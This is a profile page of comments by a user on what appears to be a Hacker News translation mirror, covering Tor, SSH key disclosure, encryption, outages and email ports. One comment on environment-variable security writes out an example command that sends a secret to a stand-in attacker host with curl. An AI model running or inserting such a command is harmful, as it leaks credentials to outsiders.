HackerTrans
トップ新着トレンドコメント過去質問紹介求人

bauruine

no profile record

投稿

Call for more Tor snowflake proxies

forum.torproject.org
2 ポイント·投稿者 bauruine·5 か月前·0 コメント

コメント

bauruine
·先月·議論
Isn't that propagating with around the speed of light? Switzerland is only about 1 light ms wide so even if they only have one master clock instead of one per train station the latency should be negligible especially in the 1950s.
bauruine
·先月·議論
quantum computers won't save you as they aren't helping you crack symmetric encryption like AES which is most likely used for an encrypted hard disk.

https://words.filippo.io/128-bits/
bauruine
·3 か月前·議論
How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.

What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?
bauruine
·3 か月前·議論
>it costs me nothing to change my vocabulary

It cost reddit a 3 hour outage.

>The nodeSelector and peerSelector for the route reflectors target the label `node-role.kubernetes.io/master`. In the 1.20 series, Kubernetes changed its terminology from “master” to “control-plane.” And in 1.24, they removed references to “master,” even from running clusters. This is the cause of our outage.

https://old.reddit.com/r/RedditEng/comments/11xx5o0/you_brok...
bauruine
·4 か月前·議論
The Internet: Where the men are men, the women are men and the children are FBI agents.
bauruine
·4 か月前·議論
True but a server that wants to "deanonymize" you can just reject each key till he has all the default keys and the ones you added to your ssh agent.

You can try it yourself [0] returns all the keys you send and even shows you your github username if one of the keys is used there.

[0] ssh whoami.filippo.io
bauruine
·4 か月前·議論
ssh by default sends all your public keys to a server. Yes you can limit some keys to specific hosts but it's very easy to dox yourself.
bauruine
·5 か月前·議論
The NSA surely has ordered a backdoor.

>In December 2013, a Reuters news article alleged that in 2004, before NIST standardized Dual_EC_DRBG, NSA paid RSA Security $10 million in a secret deal to use Dual_EC_DRBG as the default in the RSA BSAFE cryptography library https://en.wikipedia.org/wiki/Dual_EC_DRBG
bauruine
·5 か月前·議論
He uses the keys of his non-exit relay to directly connect from his workstation to an exit relay pretending to be the relay on his VPS. But yeah he could just use the VPS for wireguard which would be way easier.

I'm in Europe so I don't get less than 20Mbit/s on any circuit but I asume he could have got the same speed by just selecting a few local, fast nodes as bridge.
bauruine
·5 か月前·議論
I had the same few years ago. When I pointed out that I can get full root with most of the whitelisted commands they answered "We know. It's not about security but to prevent lusers from accidentally rm -rf /* the server. Feel free to spawn a root shell. You obviously know what you do"
bauruine
·6 か月前·議論
Releasing it is just murder by neglect so people don't feel bad about themself that they actually killed their pet just because "they can't care" for it anymore aka they don't want to deal with the minor inconvenience of caring for a pet anymore. Or worse they become a pest that wipes out whole local ecosystems.
bauruine
·6 か月前·議論
You never release exotic pets to the wild. Isn't that common knowledge by now? If you can no longer care for an animal bring it to the vet to get it euthanized.
bauruine
·6 か月前·議論
You don't have to be cloudflare for this kind of analysis you can do it yourself without even needing an ASN using RIPE RIS.

https://www.ripe.net/analyse/internet-measurements/routing-i...
bauruine
·6 か月前·議論
I doubt it's that much but with the same logic you could also ban HN, SSH and basically any protocol thats not https "with no one noticing" because 99.9+% doesnt use it.
bauruine
·6 か月前·議論
Sure but from your link

>The PBL detects end-user IP address ranges which should not be attempting to directly deliver unauthenticated SMTP email to any Internet mail server. All the email originated by an IP listed in PBL is expected to be submitted - using authentication - to a SMTP server which delivers it to destination

Means in practice port 25 (unauthenticated) and port 587 (authenticated)
bauruine
·6 か月前·議論
Tor has a transport using exactly that.

https://blog.torproject.org/introducing-webtunnel-evading-ce...
bauruine
·6 か月前·議論
SMTP isn't filtered it's port 25 that is. And from a short look at the readme it looks like it's using the transmission port 587 which shouldn't be filtered.
bauruine
·7 か月前·議論
Blending in with the crowd doesn't work. If you use Chrome on Windows you're part of a very large group and "don't stick out". But it's also very easy to fingerprint so you're also part of the "theturtletalks" group with the size of one.
bauruine
·7 か月前·議論
More details here https://as32590.net/steamcache/
bauruine
·8 か月前·議論
You mean like Matrix or XMPP? They just aren't as ubiquitous as email unfortunately.